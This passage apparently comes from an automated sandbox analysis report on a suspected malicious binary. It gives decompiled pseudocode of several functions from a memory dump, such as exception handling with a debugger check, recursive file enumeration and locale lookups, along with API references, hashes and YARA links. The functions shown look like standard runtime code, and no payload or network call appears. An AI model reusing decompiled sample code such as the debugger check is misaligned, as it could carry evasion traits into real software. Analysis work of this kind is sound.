				E0040BDD0(_t65,  &_v804, 0, 0x50);
				E0040BDD0(_t65,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t60;
				_v556 = _t64;
				_v560 = _t59;
				_v564 = _t68;
				_v568 = _t65;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t66 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t57 = UnhandledExceptionFilter( &_v812);
				if(_t57 == 0 && _t66 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E0040B1B7(_t57);
				}
				E0040AEA8();
				return _t57;
			}

0x0041353e
0x0041353e
0x0041353e
0x00413549
0x0041354e
0x00413550
0x00413557
0x00413558
0x0041355a
0x0041355d
0x00413562
0x00413562
0x0041356e
0x00413581
0x0041358f
0x00413595
0x0041359b
0x004135a1
0x004135a7
0x004135ad
0x004135b3
0x004135b9
0x004135bf
0x004135c5
0x004135cc
0x004135d3
0x004135da
0x004135e1
0x004135e8
0x004135ef
0x004135f0
0x004135f9
0x004135ff
0x00413602
0x00413608
0x00413615
0x0041361e
0x00413627
0x00413630
0x0041363e
0x00413640
0x0041364d
0x00413655
0x00413661
0x00413664
0x00413669
0x00413670
0x00413678

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00413636
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00413640
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041364D

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 08beb0fc50514b2fda31c46844d20ea96e63f697262e392d4b2b60be351b0a4c
Instruction ID: c8ef6f0e198dd1e317904bc7b81624957c4973ce17cf45d61a5af43953d1b013
Opcode Fuzzy Hash: 08beb0fc50514b2fda31c46844d20ea96e63f697262e392d4b2b60be351b0a4c
Instruction Fuzzy Hash: 9631B675901218ABCB21DF69D889BCDB7B8EF58310F5041EAE41CA6290E7749F858F49

Uniqueness

Uniqueness Score: -1.00%

Function 0041E3B5, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0041E3B5(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				void* __edi;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				union _FINDEX_INFO_LEVELS _t58;
				signed int _t61;
				signed int _t64;
				void* _t70;
				void* _t72;
				signed int _t73;
				void* _t76;
				CHAR* _t77;
				intOrPtr* _t81;
				intOrPtr _t83;
				void* _t85;
				intOrPtr* _t86;
				signed int _t90;
				signed int _t94;
				void* _t99;
				intOrPtr _t100;
				signed int _t103;
				union _FINDEX_INFO_LEVELS _t104;
				void* _t108;
				void* _t109;
				intOrPtr _t110;
				void* _t111;
				signed int _t116;
				void* _t117;
				signed int _t118;
				void* _t119;
				void* _t120;

				_push(__ecx);
				_t81 = _a4;
				_t2 = _t81 + 1; // 0x1
				_t99 = _t2;
				do {
					_t35 =  *_t81;
					_t81 = _t81 + 1;
				} while (_t35 != 0);
				_t103 = _a12;
				_t83 = _t81 - _t99 + 1;
				_v8 = _t83;
				if(_t83 <= (_t35 | 0xffffffff) - _t103) {
					_t5 = _t103 + 1; // 0x1
					_t76 = _t5 + _t83;
					_t109 = E00414C69(_t83, _t76, 1);
					_t85 = _t108;
					__eflags = _t103;
					if(_t103 == 0) {
						L6:
						_push(_v8);
						_t76 = _t76 - _t103;
						_t40 = E004234BC(_t85, _t109 + _t103, _t76, _a4);
						_t118 = _t117 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t70 = E0041E5F4(_a16, __eflags, _t109);
							E004155C5(0);
							_t72 = _t70;
							goto L8;
						}
					} else {
						_push(_t103);
						_t73 = E004234BC(_t85, _t109, _t76, _a8);
						_t118 = _t117 + 0x10;
						__eflags = _t73;
						if(_t73 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00413735();
							asm("int3");
							_t116 = _t118;
							_t119 = _t118 - 0x150;
							_t43 =  *0x438070; // 0xf2c84916
							_v48 = _t43 ^ _t116;
							_t86 = _v32;
							_push(_t76);
							_t77 = _v36;
							_push(_t109);
							_t110 = _v332.cAlternateFileName;
							_push(_t103);
							_v372 = _t110;
							while(1) {
								__eflags = _t86 - _t77;
								if(_t86 == _t77) {
									break;
								}
								_t45 =  *_t86;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t86 = E00423D90(_t77, _t86);
											continue;
										}
									}
								}
								break;
							}
							_t100 =  *_t86;
							__eflags = _t100 - 0x3a;
							if(_t100 != 0x3a) {
								L19:
								_t104 = 0;
								__eflags = _t100 - 0x2f;
								if(_t100 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t100 - 0x5c;
									if(_t100 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t100 - 0x3a;
										if(_t100 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t88 = _t86 - _t77 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t86 - _t77 + 0x00000001;
								E0040BDD0(_t104,  &_v332, _t104, 0x140);
								_t120 = _t119 + 0xc;
								_t111 = FindFirstFileExA(_t77, _t104,  &_v332, _t104, _t104, _t104);
								_t55 = _v336;
								__eflags = _t111 - 0xffffffff;
								if(_t111 != 0xffffffff) {
									_t90 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t90;
									_t91 = _t90 >> 2;
									_v344 = _t90 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E0041E3B5(_t91,  &(_v332.cFileName), _t77, _v340);
											_t120 = _t120 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t91 = _v287;
											__eflags = _t91;
											if(_t91 == 0) {
												goto L37;
											} else {
												__eflags = _t91 - 0x2e;
												if(_t91 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t61 = FindNextFileA(_t111,  &_v332);
										__eflags = _t61;
										_t55 = _v336;
									} while (_t61 != 0);
									_t101 =  *_t55;
									_t94 = _v344;
									_t64 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t94 - _t64;
									if(_t94 != _t64) {
										E004239B0(_t101 + _t94 * 4, _t64 - _t94, 4, E0041E20D);
									}
								} else {
									_push(_t55);
									_t57 = E0041E3B5(_t88, _t77, _t104, _t104);
									L26:
									_t104 = _t57;
								}
								__eflags = _t111 - 0xffffffff;
								if(_t111 != 0xffffffff) {
									FindClose(_t111);
								}
								_t58 = _t104;
							} else {
								__eflags = _t86 -  &(_t77[1]);
								if(_t86 ==  &(_t77[1])) {
									goto L19;
								} else {
									_push(_t110);
									_t58 = E0041E3B5(_t86, _t77, 0, 0);
								}
							}
							__eflags = _v12 ^ _t116;
							E0040AEA8();
							return _t58;
						} else {
							goto L6;
						}
					}
				} else {
					_t72 = 0xc;
					L8:
					return _t72;
				}
				L40:
			}

0x0041e3ba
0x0041e3bb
0x0041e3be
0x0041e3be
0x0041e3c1
0x0041e3c1
0x0041e3c3
0x0041e3c4
0x0041e3ce
0x0041e3d1
0x0041e3d4
0x0041e3d9
0x0041e3e2
0x0041e3e5
0x0041e3ef
0x0041e3f2
0x0041e3f3
0x0041e3f5
0x0041e409
0x0041e409
0x0041e40c
0x0041e416
0x0041e41b
0x0041e41e
0x0041e420
0x00000000
0x0041e422
0x0041e426
0x0041e42f
0x0041e435
0x00000000
0x0041e438
0x0041e3f7
0x0041e3f7
0x0041e3fd
0x0041e402
0x0041e405
0x0041e407
0x0041e43e
0x0041e440
0x0041e441
0x0041e442
0x0041e443
0x0041e444
0x0041e445
0x0041e44a
0x0041e44e
0x0041e450
0x0041e456
0x0041e45d
0x0041e460
0x0041e463
0x0041e464
0x0041e467
0x0041e468
0x0041e46b
0x0041e46c
0x0041e48d
0x0041e48d
0x0041e48f
0x00000000
0x00000000
0x0041e474
0x0041e476
0x0041e478
0x0041e47a
0x0041e47c
0x0041e47e
0x0041e480
0x0041e48b
0x00000000
0x0041e48b
0x0041e480
0x0041e47c
0x00000000
0x0041e478
0x0041e491
0x0041e493
0x0041e496
0x0041e4af
0x0041e4af
0x0041e4b1
0x0041e4b4
0x0041e4c4
0x0041e4c6
0x0041e4c6
0x0041e4b6
0x0041e4b6
0x0041e4b9
0x00000000
0x0041e4bb
0x0041e4bb
0x0041e4be
0x00000000
0x0041e4c0
0x0041e4c0
0x0041e4c0
0x0041e4be
0x0041e4b9
0x0041e4cc
0x0041e4d4
0x0041e4d8
0x0041e4e6
0x0041e4eb
0x0041e500
0x0041e502
0x0041e508
0x0041e50b
0x0041e53d
0x0041e53d
0x0041e53f
0x0041e542
0x0041e548
0x0041e548
0x0041e54f
0x0041e569
0x0041e569
0x0041e578
0x0041e57d
0x0041e580
0x0041e582
0x00000000
0x00000000
0x00000000
0x00000000
0x0041e551
0x0041e551
0x0041e557
0x0041e559
0x00000000
0x0041e55b
0x0041e55b
0x0041e55e
0x00000000
0x0041e560
0x0041e560
0x0041e567
0x00000000
0x00000000
0x00000000
0x00000000
0x0041e567
0x0041e55e
0x0041e559
0x00000000
0x0041e584
0x0041e58c
0x0041e592
0x0041e594
0x0041e594
0x0041e59c
0x0041e5a1
0x0041e5a9
0x0041e5ac
0x0041e5ae
0x0041e5c2
0x0041e5c7
0x0041e50d
0x0041e50d
0x0041e511
0x0041e519
0x0041e519
0x0041e519
0x0041e51b
0x0041e51e
0x0041e521
0x0041e521
0x0041e527
0x0041e498
0x0041e49b
0x0041e49d
0x00000000
0x0041e49f
0x0041e49f
0x0041e4a5
0x0041e4aa
0x0041e49d
0x0041e52e
0x0041e531
0x0041e539
0x00000000
0x00000000
0x00000000
0x0041e407
0x0041e3db
0x0041e3dd
0x0041e439
0x0041e43d
0x0041e43d
0x00000000

Strings

., xrefs: 0041E548

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 7b9f6047d1b12ccacb0f5cbe8224990f761efcee1c2752fe99eee4576f0c928d
Instruction ID: 8631c8131ac711fba31bfe3028c3abf8352d57b816dffc73976f7f870510adaa
Opcode Fuzzy Hash: 7b9f6047d1b12ccacb0f5cbe8224990f761efcee1c2752fe99eee4576f0c928d
Instruction Fuzzy Hash: EC31F475900208ABCB248E7ACC84EFB7BBDDB85314F0401AEF919D7291E6349E858B54

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0B2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00416B06,?,00000006), ref: 0041A105

Strings

GetLocaleInfoEx, xrefs: 0041A0CD

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: c17e6e1076675fef5abfa768fdb87c239eea36eec13a94c048575674be4d0a98
Instruction ID: 4bc455ebe2d6feaed00550a7a9dfb4f263a5dae3e53d632af5760b6eab62cb06
Opcode Fuzzy Hash: c17e6e1076675fef5abfa768fdb87c239eea36eec13a94c048575674be4d0a98
Instruction Fuzzy Hash: CDF0F631B05218B7CB12AF61EC02FAEBF65EF08710F41001FFC0566290CE755D61969E

Uniqueness

Uniqueness Score: -1.00%

Function 0041A11C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0041A15B

Strings

GetSystemTimePreciseAsFileTime, xrefs: 0041A137

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Time$FileSystem
String ID: GetSystemTimePreciseAsFileTime
API String ID: 2086374402-595813830
Opcode ID: 2dfa49af7858127234a41531e225f8f37667029fce1dd4c426af8e40b3848956
Instruction ID: f35fb4d45cabf76922a5e5b36406f55325b4fd6b144b21b5a4d78a9387f5a811
Opcode Fuzzy Hash: 2dfa49af7858127234a41531e225f8f37667029fce1dd4c426af8e40b3848956
Instruction Fuzzy Hash: B3E05531B45228B7C310AB20AC02E7FBB55EB04B10B81002FF809A7281CE680D1286CE

Uniqueness

Uniqueness Score: -1.00%

Function 00421258, Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00421258(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				signed int _t22;
				void* _t24;
				signed int _t28;
				void* _t30;
				void* _t32;
				void* _t33;
				signed int* _t49;
				int _t53;
				signed int _t55;

				_t16 =  *0x438070; // 0xf2c84916
				_v8 = _t16 ^ _t55;
				_push(_t32);
				_t33 = E00418C71(_t32, __ecx, __edx);
				_t49 =  *(E00418C71(_t33, __ecx, __edx) + 0x34c);
				_t53 = E00421330(_a4);
				asm("sbb ecx, ecx");
				_t22 = GetLocaleInfoW(_t53, ( ~( *(_t33 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
				if(_t22 != 0) {
					_t24 = E0041E061(_t33, _t49, _t53,  *((intOrPtr*)(_t33 + 0x50)),  &_v248);
					if(_t24 != 0) {
						if( *(_t33 + 0x60) == 0 &&  *((intOrPtr*)(_t33 + 0x5c)) != 0) {
							_t30 = E0041E061(_t33, _t49, _t53,  *((intOrPtr*)(_t33 + 0x50)),  &_v248);
							if(_t30 == 0) {
								_push(_t49);
								_push(_t30);
								goto L9;
							}
						}
					} else {
						if( *(_t33 + 0x60) != _t24) {
							L10:
							 *_t49 =  *_t49 | 0x00000004;
							_t49[1] = _t53;
							_t49[2] = _t53;
						} else {
							_push(_t49);
							_push(1);
							L9:
							_push(_t53);
							if(E00421488(_t33) != 0) {
								goto L10;
							}
						}
					}
					_t28 =  !( *_t49 >> 2) & 0x00000001;
				} else {
					 *_t49 =  *_t49 & _t22;
					_t28 = _t22 + 1;
				}
				E0040AEA8();
				return _t28;
			}

0x00421263
0x0042126a
0x0042126d
0x00421278
0x00421280
0x0042128f
0x0042129b
0x004212ac
0x004212b4
0x004212c5
0x004212ce
0x004212de
0x004212f0
0x004212f9
0x004212fb
0x004212fc
0x00000000
0x004212fc
0x004212f9
0x004212d0
0x004212d3
0x0042130a
0x0042130a
0x0042130d
0x00421310
0x004212d5
0x004212d5
0x004212d6
0x004212fd
0x004212fd
0x00421308
0x00000000
0x00000000
0x00421308
0x004212d3
0x0042131a
0x004212b6
0x004212b6
0x004212b8
0x004212b8
0x00421325
0x0042132d

APIs

Part of subcall function 00418C71: GetLastError.KERNEL32(?,00000000,00410626,00000000,00000000,?,0041BD67,00000000,00000000,?), ref: 00418C75
Part of subcall function 00418C71: _free.LIBCMT ref: 00418CA8
Part of subcall function 00418C71: SetLastError.KERNEL32(00000000,00000000,?), ref: 00418CE9
Part of subcall function 00418C71: _abort.LIBCMT ref: 00418CEF

Part of subcall function 00418C71: _free.LIBCMT ref: 00418CD0
Part of subcall function 00418C71: SetLastError.KERNEL32(00000000,00000000,?), ref: 00418CDD

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004212AC

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: ce0a7f6779d42b0d628cc66d55950f15c17e453adffe4b5a169964bf3c379be0
Instruction ID: 624b8d763e27622ea61ea7437a42470a36262d2fb3dc0e5ed78f149f3f6f7e94
Opcode Fuzzy Hash: ce0a7f6779d42b0d628cc66d55950f15c17e453adffe4b5a169964bf3c379be0
Instruction Fuzzy Hash: 9F21D3326002269BEF24DA25EC41BBB73A8EB55314F50017FFC01D6691EB7C9D41CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00420EE0, Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00420EE0(void* __ecx, void* __edx, signed int* _a4) {
				void* __ebx;
				intOrPtr _t26;
				intOrPtr _t29;
				signed int _t32;
				signed char _t33;
				signed char _t34;
				void* _t36;
				intOrPtr* _t39;
				intOrPtr* _t42;
				signed int _t48;
				void* _t51;
				void* _t52;
				signed int* _t53;
				void* _t54;
				signed int _t62;

				_t54 = E00418C71(_t36, __ecx, __edx);
				_t48 = 2;
				_t39 =  *((intOrPtr*)(_t54 + 0x50));
				_t51 = _t39 + 2;
				do {
					_t26 =  *_t39;
					_t39 = _t39 + _t48;
				} while (_t26 != 0);
				_t42 =  *((intOrPtr*)(_t54 + 0x54));
				 *(_t54 + 0x60) = 0 | _t39 - _t51 >> 0x00000001 == 0x00000003;
				_t52 = _t42 + 2;
				do {
					_t29 =  *_t42;
					_t42 = _t42 + _t48;
				} while (_t29 != 0);
				_t53 = _a4;
				 *(_t54 + 0x64) = 0 | _t42 - _t52 >> 0x00000001 == 0x00000003;
				_t53[1] = 0;
				if( *(_t54 + 0x60) == 0) {
					_t48 = E00420FDC( *((intOrPtr*)(_t54 + 0x50)));
				}
				 *(_t54 + 0x5c) = _t48;
				_t32 = EnumSystemLocalesW(E00421008, 1);
				_t62 =  *_t53 & 0x00000007;
				asm("bt ecx, 0x9");
				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
				asm("bt ecx, 0x8");
				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
				if((_t34 & (_t48 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
					 *_t53 = 0;
					return _t34;
				}
				return _t34;
			}

0x00420eed
0x00420ef3
0x00420ef4
0x00420ef7
0x00420efa
0x00420efa
0x00420efd
0x00420eff
0x00420f0d
0x00420f13
0x00420f16
0x00420f19
0x00420f19
0x00420f1c
0x00420f1e
0x00420f27
0x00420f32
0x00420f35
0x00420f3b
0x00420f46
0x00420f46
0x00420f4f
0x00420f52
0x00420f5a
0x00420f60
0x00420f64
0x00420f69
0x00420f6d
0x00420f72
0x00420f74
0x00000000
0x00420f74
0x00420f7a

APIs

Part of subcall function 00418C71: GetLastError.KERNEL32(?,00000000,00410626,00000000,00000000,?,0041BD67,00000000,00000000,?), ref: 00418C75
Part of subcall function 00418C71: _free.LIBCMT ref: 00418CA8
Part of subcall function 00418C71: SetLastError.KERNEL32(00000000,00000000,?), ref: 00418CE9
Part of subcall function 00418C71: _abort.LIBCMT ref: 00418CEF

EnumSystemLocalesW.KERNEL32(00421008,00000001,00000000,?,004170A8,?,00421635,00000000,?,?,?), ref: 00420F52

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 46e35636891a5431daea33be4c0e26be5450ae972ab163026f67cd18cfa9f019
Instruction ID: 0e89bfab1360d880e8689361d72c37285cda9e5d0443d4205293dfec63d91aa4
Opcode Fuzzy Hash: 46e35636891a5431daea33be4c0e26be5450ae972ab163026f67cd18cfa9f019
Instruction Fuzzy Hash: 7511553A3043014FDB289F39D8916BBBB92FF80358B59442EE94687B41E3B5A842C744

Uniqueness

Uniqueness Score: -1.00%

Function 00421488, Relevance: 1.5, APIs: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00421488(void* __ebx, signed int _a4, intOrPtr _a8) {
				short _v8;
				void* __ecx;
				void* _t8;
				void* _t12;
				intOrPtr _t13;
				void* _t16;
				void* _t20;
				void* _t22;
				void* _t24;
				signed int _t27;
				intOrPtr* _t29;

				_push(_t16);
				_t8 = E00418C71(__ebx, _t16, _t22);
				_t27 = _a4;
				_t24 = _t8;
				if(GetLocaleInfoW(_t27 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) != 0) {
					if(_t27 == _v8 || _a8 == 0) {
						L7:
						_t12 = 1;
					} else {
						_t29 =  *((intOrPtr*)(_t24 + 0x50));
						_t20 = _t29 + 2;
						do {
							_t13 =  *_t29;
							_t29 = _t29 + 2;
						} while (_t13 != 0);
						if(E00420FDC( *((intOrPtr*)(_t24 + 0x50))) == _t29 - _t20 >> 1) {
							goto L1;
						} else {
							goto L7;
						}
					}
				} else {
					L1:
					_t12 = 0;
				}
				return _t12;
			}

0x0042148d
0x00421490
0x00421495
0x00421498
0x004214bc
0x004214c5
0x004214ef
0x004214f1
0x004214cd
0x004214cd
0x004214d0
0x004214d3
0x004214d3
0x004214d6
0x004214d9
0x004214ed
0x00000000
0x00000000
0x00000000
0x00000000
0x004214ed
0x004214be
0x004214be
0x004214be
0x004214be
0x004214f7

APIs

Part of subcall function 00418C71: GetLastError.KERNEL32(?,00000000,00410626,00000000,00000000,?,0041BD67,00000000,00000000,?), ref: 00418C75
Part of subcall function 00418C71: _free.LIBCMT ref: 00418CA8
Part of subcall function 00418C71: SetLastError.KERNEL32(00000000,00000000,?), ref: 00418CE9
Part of subcall function 00418C71: _abort.LIBCMT ref: 00418CEF

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00421226,00000000,00000000,?), ref: 004214B4

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: b204458b117ebe72c5d2a1abf7042c272a545a124dd716591da7251150cc50d2
Instruction ID: 1f840fa46229b8ba4b0959d42719cbce0f9c60335f7b3438c5d494aabdaf1341
Opcode Fuzzy Hash: b204458b117ebe72c5d2a1abf7042c272a545a124dd716591da7251150cc50d2
Instruction Fuzzy Hash: 3EF04932B00131BBDB346A61DC05BBB7799EB40318F54052FEC0DA3250EA78BE01C6D4

Uniqueness

Uniqueness Score: -1.00%

Function 00420F7B, Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420F7B(void* __ecx, void* __edx, signed char* _a4) {
				void* __ebx;
				intOrPtr _t11;
				signed int _t13;
				signed char* _t15;
				void* _t17;
				intOrPtr* _t20;
				intOrPtr _t25;
				void* _t26;
				void* _t27;

				_t27 = E00418C71(_t17, __ecx, __edx);
				_t25 = 2;
				_t20 =  *((intOrPtr*)(_t27 + 0x50));
				_t26 = _t20 + 2;
				do {
					_t11 =  *_t20;
					_t20 = _t20 + _t25;
				} while (_t11 != 0);
				_t13 = 0 | _t20 - _t26 >> 0x00000001 == 0x00000003;
				 *(_t27 + 0x60) = _t13;
				if(_t13 == 0) {
					_t25 = E00420FDC( *((intOrPtr*)(_t27 + 0x50)));
				}
				 *((intOrPtr*)(_t27 + 0x5c)) = _t25;
				EnumSystemLocalesW(E00421258, 1);
				_t15 = _a4;
				if(( *_t15 & 0x00000004) == 0) {
					 *_t15 = 0;
					return _t15;
				}
				return _t15;
			}

0x00420f88
0x00420f8e
0x00420f8f
0x00420f92
0x00420f95
0x00420f95
0x00420f98
0x00420f9a
0x00420fa8
0x00420fab
0x00420fb0
0x00420fbb
0x00420fbb
0x00420fc4
0x00420fc7
0x00420fcd
0x00420fd3
0x00420fd5
0x00000000
0x00420fd5
0x00420fdb

APIs

Part of subcall function 00418C71: GetLastError.KERNEL32(?,00000000,00410626,00000000,00000000,?,0041BD67,00000000,00000000,?), ref: 00418C75
Part of subcall function 00418C71: _free.LIBCMT ref: 00418CA8
Part of subcall function 00418C71: SetLastError.KERNEL32(00000000,00000000,?), ref: 00418CE9
Part of subcall function 00418C71: _abort.LIBCMT ref: 00418CEF

EnumSystemLocalesW.KERNEL32(00421258,00000001,00000006,?,004170A8,?,004215F9,004170A8,?,?,?,?,?,004170A8,?,?), ref: 00420FC7

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: ac9f9e48fc65b9c5fb6771e0674ed63fe7e5114841c0974c71fb37337594c7f8
Instruction ID: 12a51bf363e2c6dd75d0ceff9d67fd374b0ebe4a2f87ee2ea4309bd3031f9167
Opcode Fuzzy Hash: ac9f9e48fc65b9c5fb6771e0674ed63fe7e5114841c0974c71fb37337594c7f8
Instruction Fuzzy Hash: 60F022363003085FDB245F3AA881A7B7BD1EF8036CB46402EF9058B651E6B59C02C758

Uniqueness

Uniqueness Score: -1.00%

Function 00419D0D, Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00419D0D(void* __edx, void* __eflags) {
				int _t15;
				void* _t29;

				_t27 = __edx;
				E0040B210(__edx, 0x436548, 0xc);
				 *(_t29 - 0x1c) =  *(_t29 - 0x1c) & 0x00000000;
				E00414927( *((intOrPtr*)( *((intOrPtr*)(_t29 + 8)))));
				 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
				 *0x439d50 = E00416315( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t29 + 0xc)))))));
				_t15 = EnumSystemLocalesW(E00419CC7, 1);
				_push(0x20);
				asm("ror eax, cl");
				 *0x439d50 = 0 ^  *0x438070;
				 *(_t29 - 0x1c) = _t15;
				 *(_t29 - 4) = 0xfffffffe;
				E00419D85();
				return E0040B256(_t27);
			}

0x00419d0d
0x00419d14
0x00419d19
0x00419d22
0x00419d28
0x00419d39
0x00419d45
0x00419d55
0x00419d5c
0x00419d64
0x00419d69
0x00419d6c
0x00419d73
0x00419d7f

APIs

Part of subcall function 00414927: EnterCriticalSection.KERNEL32(-004397E0,?,00415889,00000000,00436320,0000000C,00415844,?,?,?,00414C9C,?,?,00418D26,00000001,00000364), ref: 00414936

EnumSystemLocalesW.KERNEL32(00419CC7,00000001,00436548,0000000C), ref: 00419D45

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 824835880b6ddeb4254e4ca7d738d82fdf0889c503be0889683e936e131f8b86
Instruction ID: ef1fce201a8a3bc3d436fd9991129c48d3c281aa5270fa13df5890502caab68f
Opcode Fuzzy Hash: 824835880b6ddeb4254e4ca7d738d82fdf0889c503be0889683e936e131f8b86
Instruction Fuzzy Hash: C4F03C72650204AFD700EF79E846B9D77B0EB44324F11526AF414DB2E1CB7889418F48

Uniqueness

Uniqueness Score: -1.00%

Function 00420E95, Relevance: 1.5, APIs: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420E95(void* __ecx, void* __edx, signed char* _a4) {
				intOrPtr _t9;
				signed char* _t13;
				void* _t14;
				intOrPtr* _t16;
				void* _t20;
				void* _t22;

				_t20 = E00418C71(_t14, __ecx, __edx);
				_t16 =  *((intOrPtr*)(_t20 + 0x54));
				_t22 = _t16 + 2;
				do {
					_t9 =  *_t16;
					_t16 = _t16 + 2;
				} while (_t9 != 0);
				 *(_t20 + 0x64) = 0 | _t16 - _t22 >> 0x00000001 == 0x00000003;
				EnumSystemLocalesW(0x420dec, 1);
				_t13 = _a4;
				if(( *_t13 & 0x00000004) == 0) {
					 *_t13 = 0;
					return _t13;
				}
				return _t13;
			}

0x00420ea1
0x00420ea5
0x00420ea8
0x00420eab
0x00420eab
0x00420eae
0x00420eb1
0x00420ec9
0x00420ecc
0x00420ed2
0x00420ed8
0x00420eda
0x00000000
0x00420eda
0x00420edf

APIs

Part of subcall function 00418C71: GetLastError.KERNEL32(?,00000000,00410626,00000000,00000000,?,0041BD67,00000000,00000000,?), ref: 00418C75
Part of subcall function 00418C71: _free.LIBCMT ref: 00418CA8
Part of subcall function 00418C71: SetLastError.KERNEL32(00000000,00000000,?), ref: 00418CE9
Part of subcall function 00418C71: _abort.LIBCMT ref: 00418CEF

